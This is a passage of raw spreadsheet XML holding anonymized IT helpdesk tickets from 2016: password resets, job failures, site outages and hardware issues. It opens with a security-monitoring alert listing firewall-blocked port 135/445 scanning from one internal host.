we have detected at least 269 occurrences of your firewall att-apac-asa.company.com-1/54.96.80.216 dropping traffic sourcing from HostName_17/29.26.13.3095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shatryung_x000D_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event id: 93605481_x000D_
event summary: internal outbreak for 135/tcp_x000D_
occurrence count: 269_x000D_
event count: 2_x000D_
_x000D_
host and connection information_x000D_
source ip: 29.26.13.3095_x000D_
source hostname: HostName_17_x000D_
source port: 56991_x000D_
destination hostname: lmxl9516623_x000D_
destination port: 135_x000D_
connection directionality: internal_x000D_
protocol: tcp_x000D_
_x000D_
device information_x000D_
device ip: 54.96.80.216_x000D_
device name: att-apac-asa.company.com-1_x000D_
log time: 2016-09-07 at 09:16:25 utc_x000D_
action: blocked_x000D_
cvss score: -1 _x000D_
_x000D_
scwx event processing information_x000D_
sherlock rule id (sle): 537074_x000D_
inspector rule id: 186739_x000D_
inspector event id: 886845862_x000D_
ontology id: 200020003203009144_x000D_
event type id: 200020003203009044_x000D_
agent id: 103955_x000D_
_x000D_
event detail:_x000D_
sep 7 09:16:25 54.96.80.216 %asa-2-106001: inbound tcp connection denied from 29.26.13.3095/56991 to 10.10.6.61/135 flags syn on interface inside_x000D_
sep 7 09:16:31 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57004 dst outside:192.168.1.131/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
sep 7 09:16:34 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57017 dst outside:192.168.0.17/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
sep 7 09:16:42 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57050 dst outside:192.168.2.101/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
sep 7 09:16:56 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57072 dst outside:192.168.1.141/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
sep 7 09:16:58 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57077 dst outside:192.168.1.101/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
sep 7 09:17:01 54.96.80.216 %asa-2-106001: inbound tcp connection denied from 29.26.13.3095/57083 to 10.254.255.39/135 flags syn on interface inside_x000D_
sep 7 09:17:02 54.96.80.216 %asa-2-106001: inbound tcp connection denied from 29.26.13.3095/57086 to 10.240.84.111/135 flags syn on interface inside_x000D_
sep 7 09:17:14 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57099 dst outside:192.168.1.94/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
sep 7 09:17:24 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57123 dst outside:192.168.1.107/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
sep 7 09:17:31 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57135 dst outside:192.168.0.103/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
sep 7 09:17:37 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57146 dst outside:172.16.100.30/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
sep 7 09:17:44 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57168 dst outside:192.168.1.128/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
sep 7 09:17:48 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57190 dst outside:192.168.1.14/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
sep 7 09:17:49 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57194 dst outside:192.168.1.110/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
sep 7 09:17:51 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57199 dst outside:192.168.1.234/135 by access-group "acl_inside" [0x0, 0x0]_x000D_
_x000D_
ascii packet(s):_x000D_
[no entry]_x000D_
_x000D_
hex packet(s):_x000D_
[no entry]_x000D_
_x000D_
event id: 93605486_x000D_
event summary: internal outbreak for 135/tcp_x000D_
occurrence count: 269_x000D_
event count: 2_x000D_
_x000D_
host and connection information_x000D_
source ip: 29.26.13.3095_x000D_
source hostname: HostName_17_x000D_
source port: 56991_x000D_
destination hostname: [no entry]_x000D_
destination port: 135_x000D_
connection directionality: internal_x000D_
protocol: tcp_x000D_
_x000D_
device information_x000D_
device ip: 54.96.80.216_x000D_
device name: att-apac-asa.company.com-1_x000D_
log time: 2016-09-07 at 09:16:25 utc_x000D_
action: blocked_x000D_
cvss score: -1 _x000D_
_x000D_
scwx event processing information_x000D_
sherlock rule id (sle): 537074_x000D_
inspector rule id: 186739_x000D_
inspector event id: 886845862_x000D_
ontology id: 200020003203009144_x000D_
event type id: 200020003203009044_x000D_
agent id: 103955_x000D_
_x000D_
event detail:_x000D_
sep 7 09:16:32 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57007 dst outside:192.168.1.131/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
sep 7 09:16:35 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57023 dst outside:192.168.0.17/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
sep 7 09:16:39 54.96.80.216 %asa-2-106001: inbound tcp connection denied from 29.26.13.3095/57040 to 10.70.120.71/445 flags syn on interface inside_x000D_
sep 7 09:16:43 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57053 dst outside:192.168.2.101/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
sep 7 09:16:46 54.96.80.216 %asa-2-106001: inbound tcp connection denied from 29.26.13.3095/57057 to 10.10.6.61/445 flags syn on interface inside_x000D_
sep 7 09:16:58 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57076 dst outside:192.168.1.141/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
sep 7 09:16:59 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57079 dst outside:192.168.1.101/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
sep 7 09:17:15 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57102 dst outside:192.168.1.94/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
sep 7 09:17:22 54.96.80.216 %asa-2-106001: inbound tcp connection denied from 29.26.13.3095/57117 to 10.254.255.39/445 flags syn on interface inside_x000D_
sep 7 09:17:23 54.96.80.216 %asa-2-106001: inbound tcp connection denied from 29.26.13.3095/57120 to 10.240.84.111/445 flags syn on interface inside_x000D_
sep 7 09:17:25 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57126 dst outside:192.168.1.107/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
sep 7 09:17:32 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57137 dst outside:192.168.0.103/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
sep 7 09:17:39 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57150 dst outside:172.16.100.30/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
sep 7 09:17:45 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57177 dst outside:192.168.1.128/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
sep 7 09:17:47 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57185 dst outside:192.168.1.117/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
sep 7 09:17:49 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57193 dst outside:192.168.1.14/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
_x000D_
ascii packet(s):_x000D_
[no entry]_x000D_
_x000D_
hex packet(s):_x000D_
[no entry]_x000D_
_x000D_
_x000D_
these appends may contain the same information as the original alert or may contain differences in the source destination pair. please view updates to this ticket via the portal. the security operations team will notify you as further information becomes available._x000D_
_x000D_
 security analysis team_x000D_
877</t>
  </si>
  <si>
    <t>spam call received from india.</t>
  </si>
  <si>
    <t>fhxsowau nfybhaxg</t>
  </si>
  <si>
    <t>anleitung fuer password_management_tool password manager gebraucht.</t>
  </si>
  <si>
    <t>zmybfdqg cbwknmps</t>
  </si>
  <si>
    <t>job_scheduler workstation HostName_242</t>
  </si>
  <si>
    <t>observerd fence &amp; limit are 0 for HostName_242</t>
  </si>
  <si>
    <t>internet explorer update to version11</t>
  </si>
  <si>
    <t>orjszque lukegwam</t>
  </si>
  <si>
    <t>kwfiaztm bdytamoj</t>
  </si>
  <si>
    <t>simfghon wants to use the mail.</t>
  </si>
  <si>
    <t>owa configured._x000D_
explained that outlook is also already installed.</t>
  </si>
  <si>
    <t>we_wu101 account unlock.</t>
  </si>
  <si>
    <t>i would like to download a free software called bizagi but i cannot due to some securities set up.</t>
  </si>
  <si>
    <t xml:space="preserve">i would like to download a free software called bizagi but i cannot due to some securities set up therefore i need your support </t>
  </si>
  <si>
    <t>data retrieval from backup server</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: vkzwibco.pueyvhoi@gmail.com
dear sir/madam,
some zipped folders of around 700-800 mb are missing from the following paths â€“
(HostName_95)
w:\zollerfgh - documents&lt;file:///\\HostName_95\grinding\zollerfgh%20-%20documents&gt;
w:\trial data\softwares\zollerfgh&lt;file:///\\HostName_95\grinding\trial%20data\softwares\zollerfgh&gt;
these had the data backup from zollerfgh genius machine and are required on an urgent basis now because the machine is in breakdown condition.
please retrieve this data from back-up server.
</t>
  </si>
  <si>
    <t>cisco access point is not working.</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ughzilfm.cfibdamq@gmail.com
hallo ,
cisco access point is not working.
mac address : 1819drtb8e64
</t>
  </si>
  <si>
    <t xml:space="preserve">cisco access point is not working.
mac address : 1819drtb8e64
</t>
  </si>
  <si>
    <t>yevirgnl ylhogjct</t>
  </si>
  <si>
    <t>account owner issue_please assign it to "msd crm" team</t>
  </si>
  <si>
    <t xml:space="preserve">i discovered that there is an issue with account owner in msd._x000D_
below examples of company accounts which have set up owner as company._x000D_
_x000D_
_x000D_
erp customer # (account) (account) owner (account) (account)_x000D_
81587672 company_x000D_
81936758 company_x000D_
81660515 company_x000D_
81932598 company_x000D_
81883649 company_x000D_
81542410 company_x000D_
81805412 company_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: scjxobhd.ldypjkmf@gmail.com_x000D_
_x000D_
hello help team,_x000D_
_x000D_
can you pls. open a ticket._x000D_
it help might be needed for a meeting scheduled at fÃ¼rth, room #1, on september 14 (start at 9:00 am) &amp; 15._x000D_
the meeting will be conducted by two external trainers and they might need help to start their presentations (beamer)._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>not able to open an xcel file.</t>
  </si>
  <si>
    <t xml:space="preserve">not able to open an xcel file.
</t>
  </si>
  <si>
    <t>dchzofyt kecxjvwq</t>
  </si>
  <si>
    <t xml:space="preserve">atp are available at delivery plant plant_283, but order items cannot get confirmed at the same day. </t>
  </si>
  <si>
    <t xml:space="preserve">from yesterday, we found that some order items can only be confirmed in future(not same day with order entry) even there are full atp available at delivery plant plant_283. csrs got many calls from customers to have them manually generate dn for their orders. _x000D_
_x000D_
here are some example, please check:_x000D_
_x000D_
35988706_x000D_
24870388 #20 &amp; #30_x000D_
35989571 #10_x000D_
35994606 #10_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>cwhyboek axljywpf</t>
  </si>
  <si>
    <t>hello, i'm lbxgodfu usperhki from company italy. i've vpn profile is not working</t>
  </si>
  <si>
    <t xml:space="preserve">hello, i'm lbxgodfu usperhki from company italy. i've vpn profile is not working
can you please verify ? my user is : piolfghim
</t>
  </si>
  <si>
    <t>lbxgodfu usperhki</t>
  </si>
  <si>
    <t xml:space="preserve">netweaver - </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: bcxpeuko.utorqehx@gmail.com_x000D_
_x000D_
hello it team,_x000D_
please help me to update the netweaver as i am receiving the below message._x000D_
_x000D_
[cid:image001.png@01d20923.e7e007d0]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>policy ?</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: hbmwlprq.ilfvyodx@gmail.com_x000D_
_x000D_
please forward to pc support_x000D_
it seems that there is a policy in place, that automatically adds websites to the list of sites, that should be viewed in "compatibilty mode". this is a setting in internet explorer._x000D_
i would like to have this policy to be disabled, at least do not automatically add "company.com", "company.com" and "company.com"_x000D_
_x000D_
[cid:image001.png@01d208f1.b6a23530]_x000D_
_x000D_
mit freundlichem gruÃŸ / kind </t>
  </si>
  <si>
    <t>babiluntr</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: dhtxwcng.hruckmey@gmail.com_x000D_
_x000D_
[cid:image001.png@01d208ef.f2293b00]_x000D_
_x000D_
viele grÃ¼ÃŸe / best </t>
  </si>
  <si>
    <t>dhtxwcng hruckmey</t>
  </si>
  <si>
    <t>outlook is not opening</t>
  </si>
  <si>
    <t>name:ilypdtno mkdfetuq_x000D_
language:_x000D_
browser:microsoft internet explorer_x000D_
email:ilypdtno.mkdfetuq@gmail.com_x000D_
customer number:_x000D_
telephone:_x000D_
summary:outlook is not opening</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2049 failed in job_scheduler at: 09/07/2016 04:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2049 failed in job_scheduler at: 09/07/2016 04:00:00</t>
  </si>
  <si>
    <t>network outage : pol-poland site hard down since 9/7/2016 3:36 am et. no backup circuit.</t>
  </si>
  <si>
    <t>what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _________ 9/7/2016 3:36 am et_____________x000D_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______na__     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  __no_______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</si>
  <si>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Job_512 failed in job_scheduler at: 09/07/2016 03:46:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_512 failed in job_scheduler at: 09/07/2016 03:46:00</t>
  </si>
  <si>
    <t>pls. unlock &amp; reset windows &amp; erp account for user vvtghjscha</t>
  </si>
  <si>
    <t>install win7 \ewew8323546 \sgnubadl gpkovbah</t>
  </si>
  <si>
    <t>install win7 \ewew8323545 \sgnubadl gpkovbah</t>
  </si>
  <si>
    <t>install win7 \ewew8323506 \vzqomdgt jwoqbuml</t>
  </si>
  <si>
    <t>install win7 \ewew8323504 \vzqomdgt jwoqbuml</t>
  </si>
  <si>
    <t xml:space="preserve">performance improvement/tuning </t>
  </si>
  <si>
    <t>performance improvement/tuning for machine summary &amp; load list</t>
  </si>
  <si>
    <t>ejpvuxrg tryaibcx</t>
  </si>
  <si>
    <t xml:space="preserve">account locked out and password reset </t>
  </si>
  <si>
    <t>collaboration_platform é‡Œé¢æ‰“å¼€"æŸ¥çœ‹æˆ‘çš„æ‰€æœ‰åº”ç”¨"ç½‘ç«™é¡µé¢ä¸èƒ½æ˜¾ç¤ºã€‚</t>
  </si>
  <si>
    <t>collaboration_platform é‡Œé¢æ‰“å¼€"æŸ¥çœ‹æˆ‘çš„æ‰€æœ‰åº”ç”¨"é¡µé¢ä¸èƒ½æ˜¾ç¤ºã€‚</t>
  </si>
  <si>
    <t>EU_tool not working</t>
  </si>
  <si>
    <t>the well-established work orders has been reported with "system to a standstill." it can be assumed then the machine operator no longer contracts. normal maintenance jobs without stopping the machine are imported.</t>
  </si>
  <si>
    <t>oinlxfak ojlyanhs</t>
  </si>
  <si>
    <t>please unlock &amp;  reset windows password for dfrt user kreghtmph</t>
  </si>
  <si>
    <t>please unlock &amp; reset windows password for dfrt user kreghtmph</t>
  </si>
  <si>
    <t>HostName_53 -  f:\ label:dat2-HostName_53 d4e35b72  is over 85% space consumed. space available: 0.97 m</t>
  </si>
  <si>
    <t>HostName_53 -  f:\ label:dat2-HostName_53 d4e35b72 on server: HostName_53 is over 85% space consumed. space available: 0.97 m</t>
  </si>
  <si>
    <t>impacts awards password</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: gqwdslpc.clhgpqnb@gmail.com_x000D_
_x000D_
please reset my impacts awards password._x000D_
_x000D_
i am not remember even security question also._x000D_
_x000D_
_x000D_
[cid:image003.jpg@01d20900.0a6e3390]_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>circuit outage : usa - (company) vpn router is down since 02:01 am et on 09/07. primary is up.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____slo_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _________02:01 am et on 09/07_____________x000D_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    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   ____yes____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  ___no______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</si>
  <si>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pls help to create delivery note for sto 4908087268</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: gjtyswkb.dpvaymxr@gmail.com_x000D_
_x000D_
dear it,_x000D_
_x000D_
would you pls help to create delivery note for sto 5019198379, for something error we unable to create, </t>
  </si>
  <si>
    <t>companysecure  user can't get into the network</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ctzykflo.evzbhgru@gmail.com
dear all,
we have a problem that our new sales rep for 1202, rbzymfvx lebqthwv (kujfgtats), personnel # 156604998 can't get into the network companysecure.
can you please check his settings â€“ you can call him on mobile 
</t>
  </si>
  <si>
    <t>erp bex hana issue</t>
  </si>
  <si>
    <t>system (SID_34, SID_37, SID_39, SID_38, hrp, other ?):
enter user id of user having the issue: dofghbmes
transaction code(s) the user needs or was working with:
describe the issue:
the launcher was not able to connect analysis add-in. make sure that analysis add-in is not disabled by office application!
if you are getting a "not authorized" message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket.
provide access the same as this other user:</t>
  </si>
  <si>
    <t>network outage : engineering_toolkuznetsk warehouse russia site hard down since 1:52 am et on 09/07.</t>
  </si>
  <si>
    <t>what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ______no___     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   __________1:52 am et on 09/07.____________x000D_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_____no___     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _____no____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</si>
  <si>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ajnwuxiy gbhcdlkr</t>
  </si>
  <si>
    <t xml:space="preserve">job HostName_1019fail failed in job_scheduler at: 09/07/2016 01:48:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job HostName_1019fail failed in job_scheduler at: 09/07/2016 01:48:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1386 failed in job_scheduler at: 09/07/2016 00:35:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1386 failed in job_scheduler at: 09/07/2016 00:35:00</t>
  </si>
  <si>
    <t>ebhsm004 -  e:\ label:dat1-ebhsm004 dc16126c  is over 85% space consumed. space available: 4.6 g</t>
  </si>
  <si>
    <t>ebhsm004 -  e:\ label:dat1-ebhsm004 dc16126c on server: ebhsm004 is over 85% space consumed. space available: 4.6 g</t>
  </si>
  <si>
    <t>laptop service tag- fh1r262 not working(keypad issue)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: mzdkgnvs.svhkgyqb@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
i have a dell 7350 2 in 1 laptop, the system number is:aiul9912366_x000D_
when i plug in my laptop to the keypad, the whole system is shutting down,_x000D_
and with the screen docked in to the keybankrd i am unable to start the computer._x000D_
when i tried charging , it is not doing so with the screen docked in._x000D_
i am currently using the touch pad of the screen, and charging only the screen._x000D_
the keypad is totally unresponsive._x000D_
please help out._x000D_
my user name is :rajy_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>mzdkgnvs svhkgyqb</t>
  </si>
  <si>
    <t>only mouse is not working in system</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1329 failed in job_scheduler at: 09/07/2016 00:11:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1329 failed in job_scheduler at: 09/07/2016 00:11:00</t>
  </si>
  <si>
    <t>error while extending mm#</t>
  </si>
  <si>
    <t xml:space="preserve">from: kbyivdfz zwutmehy [mailto:kbyivdfz.zwutmehy@gmail.com] 
sent: wednesday, september 07, 2016 7:28 am
to: nwfodmhc exurcwkm
subject: rad:error while extending mm#
hello,
need to extend existing mm# 6427895 from plant plant_165 to plant_206.
during processing mm01, the error message pop up "material group should start with 'r' or 'd' for roh type."
however the system doesn't allow me to change material group.
*--.--.--.--.--.--.--.--.--.--.--.-the enormity of humanity / mankind is being insensitive-.--.*
æ ªå¼ä¼šç¤¾ã‚¨ã‚¯ã‚¹ãƒ„ãƒ«ãƒ¼ãƒ‰ãƒ›ãƒ¼ãƒ³
è³¼è²·æ‹…å½“ æœ‰è³€äº®å¹³
kbyivdfz zwutmehy
purchasing/buyer
company k.k.
kbyivdfz.zwutmehy@gmail.com
</t>
  </si>
  <si>
    <t>unable to login to supply_chain_software</t>
  </si>
  <si>
    <t xml:space="preserve">unable to login to supply_chain_software_x000D_
please reset the password </t>
  </si>
  <si>
    <t>wrench_engineering_tool macro issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ucdwyxko.apktrsyq@gmail.com_x000D_
_x000D_
"we are unable to run a macro which is used to open an excel/word file in solidworks after skype updation (since 24.02.2016)._x000D_
this macro is working fine in system where skype is not installed._x000D_
_x000D_
kindly resolve the issue at the earliest"._x000D_
_x000D_
_x000D_
with best </t>
  </si>
  <si>
    <t xml:space="preserve">phone email </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: baoapacg.wanrtyg@company.com
</t>
  </si>
  <si>
    <t>rekpvblc ufysatml</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: blktuiae.jzakfmhw@gmail.com_x000D_
_x000D_
my licence  for babiluntr will expire in 30 days_x000D_
_x000D_
please update this to use it more_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>pls help to reset the password for this erp id: tempuser.</t>
  </si>
  <si>
    <t>pls help to reset the password for this id: tempuser.</t>
  </si>
  <si>
    <t>walkmeåŠ è½½æ•…éšœ</t>
  </si>
  <si>
    <t>walkmeä¸‹è½½å®‰è£…åŽï¼ŒæŒ‰é’®ä¸èƒ½åœ¨æµè§ˆå™¨ç•Œé¢æ˜¾çŽ°</t>
  </si>
  <si>
    <t>whflryeb fatgdzhq</t>
  </si>
  <si>
    <t>ç”µè„‘å¼€æœºæ•…éšœ</t>
  </si>
  <si>
    <t>åŽŸææ–™ä»“åº“ç”µè„‘å¼€æœºè“å±ï¼Œä¸»æœºé¢æ¿3ã€4æŒ‡ç¤ºç¯æŠ¥è­¦</t>
  </si>
  <si>
    <t>ycjxrsba ehftdorm</t>
  </si>
  <si>
    <t xml:space="preserve">gas station telephone line disconnection </t>
  </si>
  <si>
    <t>hdqfgbei rnybhzve</t>
  </si>
  <si>
    <t>å¼€ä¸äº†æœº</t>
  </si>
  <si>
    <t>å¼€ä¸äº†æœºï¼Œæ˜¾ç¤ºç³»ç»Ÿåäº†ã€‚</t>
  </si>
  <si>
    <t>kclhqspo xvugztyc</t>
  </si>
  <si>
    <t>im locked out of erp agian</t>
  </si>
  <si>
    <t>name:sndaofyw jetcxpda
language:
browser:microsoft internet explorer
email:vichtyuky.warhtyonack@company.com
customer number:
telephone:
summary:im locked out of erp agian</t>
  </si>
  <si>
    <t>user needs help with extended monitor projection.</t>
  </si>
  <si>
    <t>user needs help with extended monitor projection._x000D_
-connected to the user system using teamviewer._x000D_
-help the user witrh the extended monitor projection._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>ess login issue_x000D_
-verified user details.(employee# &amp; manager name)_x000D_
-checked the user name in ad _x000D_
-advised the user to login and check._x000D_
-caller confirmed that she was able to login._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>bcxfhekz bplfrnis</t>
  </si>
  <si>
    <t>global_telecom_1 broadband</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: vnetbgio.lqxztben@gmail.com
hi,
not sure where to direct this. i was told to contact the help desk because my global_telecom_1 broadband isn't working when trying to use my laptop from a remote location.
am i in the right place?
davidthd rofghach
channel partner sales engineer
vnetbgio.lqxztben@gmail.com&lt;mailto:vnetbgio.lqxztben@gmail.com&gt;
</t>
  </si>
  <si>
    <t>unable to complete forecast</t>
  </si>
  <si>
    <t xml:space="preserve">unable to complete forecast
jochegtyhu is on vacation
can you help me?
fnqelwpk ahrskvln
regional manager latin amerirtca
fnqelwpk.ahrskvln@gmail.com
from: fnqelwpk ahrskvln 
sent: tuesday, september 6, 2016 2:42 pm
to: ftnijxup sbltduco &lt;ftnijxup.sbltduco@gmail.com&gt;
subject: help with scm_software
jochegtyhu, 
how are you?
what does this mean? what can i do to complete my forecast?
fnqelwpk ahrskvln
regional manager latin amerirtca
fnqelwpk.ahrskvln@gmail.com
</t>
  </si>
  <si>
    <t>GRP_67</t>
  </si>
  <si>
    <t>fnqelwpk ahrskvln</t>
  </si>
  <si>
    <t>issues logging in to skype after recently changing my password</t>
  </si>
  <si>
    <t>name:obanjrhg rnafleys
language:
browser:microsoft internet explorer
email:obanjrhg.rnafleys@gmail.com
customer number:
telephone:
summary:issues logging in to skype after recently changing my password</t>
  </si>
  <si>
    <t xml:space="preserve">system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_9 - pi uacyltoe hxgaycze system
enter user id of user having the issue: vvgtycargvc
please restart password, its blocked.
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2063d failed in job_scheduler at: 09/06/2016 15:53:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2063d failed in job_scheduler at: 09/06/2016 15:53:00</t>
  </si>
  <si>
    <t>vip 2 -when i try to access the ethics training link i receive an error message: error #2001, organization code not found.</t>
  </si>
  <si>
    <t>this happens if i log in via public internet as well as internet + vpn.</t>
  </si>
  <si>
    <t>user having issues login in to the pc with the new password.</t>
  </si>
  <si>
    <t>user having issues login in to the pc with the new password._x000D_
-connected to the user system using teamviewer._x000D_
-help the user login using the new password._x000D_
-help the user login to the company vpn and sync the new password to the company network._x000D_
-help the user login to both the outlook and skype._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>zaxjnqoh jyxewlav</t>
  </si>
  <si>
    <t>ticket update for ticket_no0437735</t>
  </si>
  <si>
    <t>thwinauz ulzkaqnc</t>
  </si>
  <si>
    <t>global erp crm:  please investigate why agbighyail espinosa's employee account in erp crm is not recognized as an employee</t>
  </si>
  <si>
    <t xml:space="preserve">hello,
it please advise the status on the below request.
hi nafghyncy,
agbighyail espinosa appears to be an active employee.  after all, she entered a bunch of sales orders in erp ecc over the last few days.  yet there is a central block on her employee account in erp crm so that it does not show up in the search results when we search for employee accounts using "role is employee".  unless you already know the reason for this, would you please check with hr why her account has a central block on it?  it seems like it could possibly be an error.
gracias / </t>
  </si>
  <si>
    <t>aqtcmxuf kuxsnimy</t>
  </si>
  <si>
    <t>engineering request 2248675 assignment (revise component)</t>
  </si>
  <si>
    <t xml:space="preserve">engineering request 2248675 assignment (revise component) has been completed but cannot be deleted from my workflow. </t>
  </si>
  <si>
    <t>ethics undeliverable e-mails</t>
  </si>
  <si>
    <t xml:space="preserve">good morning,_x000D_
_x000D_
please review and advise on these "undeliverable" e-mail addresses.  _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>need to activate new iphone</t>
  </si>
  <si>
    <t>ombjicdy rlfbovdq</t>
  </si>
  <si>
    <t>report not running properly and delivering results to dataloads-app</t>
  </si>
  <si>
    <t xml:space="preserve">bex report is producing a report with 0 size instead of proper reporting.  xsdb_o20_db_credits is supposed to run on the 2nd of each month along with 3 other dashbankrd reports but for the last couple of months the report has been empty.  this has happened previously but only with the credits and not any of the 3 other reports.  please correct so it is available for next month.  this is for a global dashbankrd that is used in some areas for compensation.  </t>
  </si>
  <si>
    <t>qtiyzjaw rxtpbqvu</t>
  </si>
  <si>
    <t>unable to access travel site</t>
  </si>
  <si>
    <t xml:space="preserve">unable to access travel site </t>
  </si>
  <si>
    <t>password reset via password_management_tool password manager</t>
  </si>
  <si>
    <t>unable to post document to SID_34</t>
  </si>
  <si>
    <t xml:space="preserve">unable to post document to SID_34 using spreadsheet. </t>
  </si>
  <si>
    <t>system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_2_x000D_
_x000D_
enter user id of user having the issue: vvgtycargvc_x000D_
_x000D_
_x000D_
"user account not in validity date"</t>
  </si>
  <si>
    <t>password re-set</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: zenjimdghtybo.xirzfpob@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
please re-set mu login password for attendance_tool._x000D_
_x000D_
_x000D_
[cid:image001.jpg@01d2088d.049859f0]_x000D_
_x000D_
_x000D_
_x000D_
with best </t>
  </si>
  <si>
    <t>zenjimbo xirzfpob</t>
  </si>
  <si>
    <t>delivery failures</t>
  </si>
  <si>
    <t>material # 7359351_x000D_
location: plant_33_x000D_
sto # 5019195083_x000D_
product available. cannot create delivery.</t>
  </si>
  <si>
    <t>my password is invalid. can you help me. thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">my password is invalid. can you help me. </t>
  </si>
  <si>
    <t>jclrangd kjlnearz</t>
  </si>
  <si>
    <t>computer not booting into windows</t>
  </si>
